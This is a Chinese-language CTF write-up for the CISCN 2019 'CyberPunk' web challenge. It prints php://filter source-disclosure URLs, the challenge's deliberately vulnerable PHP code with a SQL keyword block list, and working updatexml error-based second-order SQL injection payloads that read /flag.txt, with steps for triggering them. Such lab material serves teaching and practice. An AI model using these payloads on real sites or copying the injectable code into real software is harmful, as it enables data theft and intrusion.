[CISCN2019 华北赛区 Day1 Web5]CyberPunk
知识点
- 二次注入
查看源码,在最下面找到提示
看到file,联想到可以使用filter伪协议读取源码
?file=php://filter/convert.base64-encode/resource=index.php ?file=php://filter/convert.base64-encode/resource=delete.php ?file=php://filter/convert.base64-encode/resource=search.php ?file=php://filter/convert.base64-encode/resource=config.php ?file=php://filter/convert.base64-encode/resource=confirm.php
<?php #index.php ini_set('open_basedir', '/var/www/html/'); // $file = $_GET["file"]; $file = (isset($_GET['file']) ? $_GET['file'] : null); if (isset($file)){ if (preg_match("/phar|zip|bzip2|zlib|data|input|%00/i",$file)) { echo('no way!'); exit; } @include($file); } ?>
<?php #delete.php require_once "config.php"; if(!empty($_POST["user_name"]) && !empty($_POST["phone"])) { $msg = ''; $pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i'; $user_name = $_POST["user_name"]; $phone = $_POST["phone"]; if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){ $msg = 'no sql inject!'; }else{ $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'"; $fetch = $db->query($sql); } if (isset($fetch) && $fetch->num_rows>0){ $row = $fetch->fetch_assoc(); $result = $db->query('delete from `user` where `user_id`=' . $row["user_id"]); if(!$result) { echo 'error'; print_r($db->error); exit; } $msg = "订单删除成功"; } else { $msg = "未找到订单!"; } }else { $msg = "信息不全"; }
<?php #confirm.php require_once "config.php"; //var_dump($_POST); if(!empty($_POST["user_name"]) && !empty($_POST["address"]) && !empty($_POST["phone"])) { $msg = ''; $pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i'; $user_name = $_POST["user_name"]; $address = $_POST["address"]; $phone = $_POST["phone"]; if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){ $msg = 'no sql inject!'; }else{ $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'"; $fetch = $db->query($sql); } if($fetch->num_rows>0) { $msg = $user_name."已提交订单"; }else{ $sql = "insert into `user` ( `user_name`, `address`, `phone`) values( ?, ?, ?)"; $re = $db->prepare($sql); $re->bind_param("sss", $user_name, $address, $phone); $re = $re->execute(); if(!$re) { echo 'error'; print_r($db->error); exit; } $msg = "订单提交成功"; } } else { $msg = "信息不全"; } ?>
<?php #search.php require_once "config.php"; if(!empty($_POST["user_name"]) && !empty($_POST["phone"])) { $msg = ''; $pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i'; $user_name = $_POST["user_name"]; $phone = $_POST["phone"]; if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){ $msg = 'no sql inject!'; }else{ $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'"; $fetch = $db->query($sql); } if (isset($fetch) && $fetch->num_rows>0){ $row = $fetch->fetch_assoc(); if(!$row) { echo 'error'; print_r($db->error); exit; } $msg = "<p>姓名:".$row['user_name']."</p><p>, 电话:".$row['phone']."</p><p>, 地址:".$row['address']."</p>"; } else { $msg = "未找到订单!"; } }else { $msg = "信息不全"; } ?>
<?php #change.php require_once "config.php"; if(!empty($_POST["user_name"]) && !empty($_POST["address"]) && !empty($_POST["phone"])) { $msg = ''; $pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i'; $user_name = $_POST["user_name"]; $address = addslashes($_POST["address"]); $phone = $_POST["phone"]; if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){ $msg = 'no sql inject!'; }else{ $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'"; $fetch = $db->query($sql); } if (isset($fetch) && $fetch->num_rows>0){ $row = $fetch->fetch_assoc(); $sql = "update `user` set `address`='".$address."', `old_address`='".$row['address']."' where `user_id`=".$row['user_id']; $result = $db->query($sql); if(!$result) { echo 'error'; print_r($db->error); exit; } $msg = "订单修改成功"; } else { $msg = "未找到订单!"; } }else { $msg = "信息不全"; } ?>
<?php #config.php ini_set("open_basedir", getcwd() . ":/etc:/tmp"); $DATABASE = array( "host" => "127.0.0.1", "username" => "root", "password" => "root", "dbname" =>"ctfusers" ); $db = new mysqli($DATABASE['host'],$DATABASE['username'],$DATABASE['password'],$DATABASE['dbname']);
confirm.php处使用了预处理语句,不好注入
注意到change.php,使用了 addslashes()函数,这里转义单引号等字符,但是入库的时候不会将转义符\入库,而取出数据时也没有过滤,造成二次注入。
$address = addslashes($_POST["address"]); f (isset($fetch) && $fetch->num_rows>0){ $row = $fetch->fetch_assoc(); $sql = "update `user` set `address`='".$address."', `old_address`='".$row['address']."' where `user_id`=".$row['user_id']; $result = $db->query($sql); if(!$result) { echo 'error'; print_r($db->error); exit; }
payload
#查用户名 1' where user_id=updatexml(1,concat(0x7e,(select substr(user(),1,20)),0x7e),1)# #查flag 1' where user_id=updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),30,20)),0x7e),1)#
操作步骤
- 先在主页面随便输入
- 在change页面的address处输入注入代码,提交
- 再填写一次change的内容,提交,触发注入
- 因为一次查不完flag,第二次输入注入代码前,要在delete页面把前面的删掉